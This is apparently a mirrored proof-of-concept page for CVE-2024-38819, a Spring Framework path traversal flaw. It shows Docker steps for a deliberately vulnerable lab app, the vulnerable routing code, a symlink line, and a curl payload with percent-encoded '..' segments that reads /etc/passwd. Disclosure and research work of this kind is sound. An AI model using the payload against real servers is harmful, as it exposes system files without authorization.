POC详情: fd38e2b5fb503c40e0c2f430b8dd7d7ebbc73ee2

来源
关联漏洞
标题: VMware Spring Framework 安全漏洞 (CVE-2024-38819)
描述:VMware Spring Framework是美国威睿(VMware)公司的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 VMware Spring Framework存在安全漏洞。攻击者利用该漏洞可以读取服务根路径之外的文件。
介绍
# CVE-2024-38819: Proof of Concept (PoC)

This is a proof of concept for the [CVE-2024-38819](https://spring.io/security/cve-2024-38819) vulnerability, which I reported, demonstrating a path traversal exploit.

## Execution Steps
1. Build the Docker image (Spring Boot 3.3.4, based on Spring Framework 6.1.13)
   ```
   cd vuln
   docker build -t cve-2024-38819-poc .
   ```
2. Run the container and expose port 8080 to the host machine
   ```
   docker run -d -p 8080:8080 --name cve-2024-38819-poc cve-2024-38819-poc
   ```
3. Run the following command to execute the PoC and confirm the vulnerability
   ```
   curl http://localhost:8080/static/link/%2e%2e/etc/passwd
   ```

   If the attack is successful, the contents of the `/etc/passwd` file will be displayed.

## Explanation
1. Create `PathTraversalDemoApplication.java` with the following code to set up static file routing using `RouterFunction` and `FileSystemResource`:
    ```
    public RouterFunction<ServerResponse> staticResourceRouter() {
        return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/"));
    }
    ```

2. Add the following command to the Dockerfile to create a symbolic link:
    ```
    RUN ln -s /static /app/static/link
    ```

3. Create a payload that leverages percent-encoding to traverse directories through the symbolic link.
   - Path: `/static/link/%2e%2e/etc/passwd`

4. Use the following `curl` command to execute the PoC and verify if the attack is successful:
    ```
    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    ```
   If the attack is successful, the contents of the `/etc/passwd` file will be displayed.

## Disclaimer
This PoC is provided for educational and security research purposes. Before using this in a real system, ensure the vulnerability has been fixed and you have proper authorization. The author takes no responsibility for any misuse of this code.
文件快照

[4.0K] /data/pocs/fd38e2b5fb503c40e0c2f430b8dd7d7ebbc73ee2 ├── [1.0K] LICENSE ├── [1.9K] README.md ├── [4.0K] safe │   ├── [ 477] build.gradle │   ├── [ 550] Dockerfile │   └── [4.0K] src │   └── [4.0K] main │   └── [4.0K] java │   └── [4.0K] com │   └── [4.0K] example │   └── [ 975] PathTraversalDemoApplication.java └── [4.0K] vuln ├── [ 477] build.gradle ├── [ 550] Dockerfile └── [4.0K] src └── [4.0K] main └── [4.0K] java └── [4.0K] com └── [4.0K] example └── [ 975] PathTraversalDemoApplication.java 12 directories, 8 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。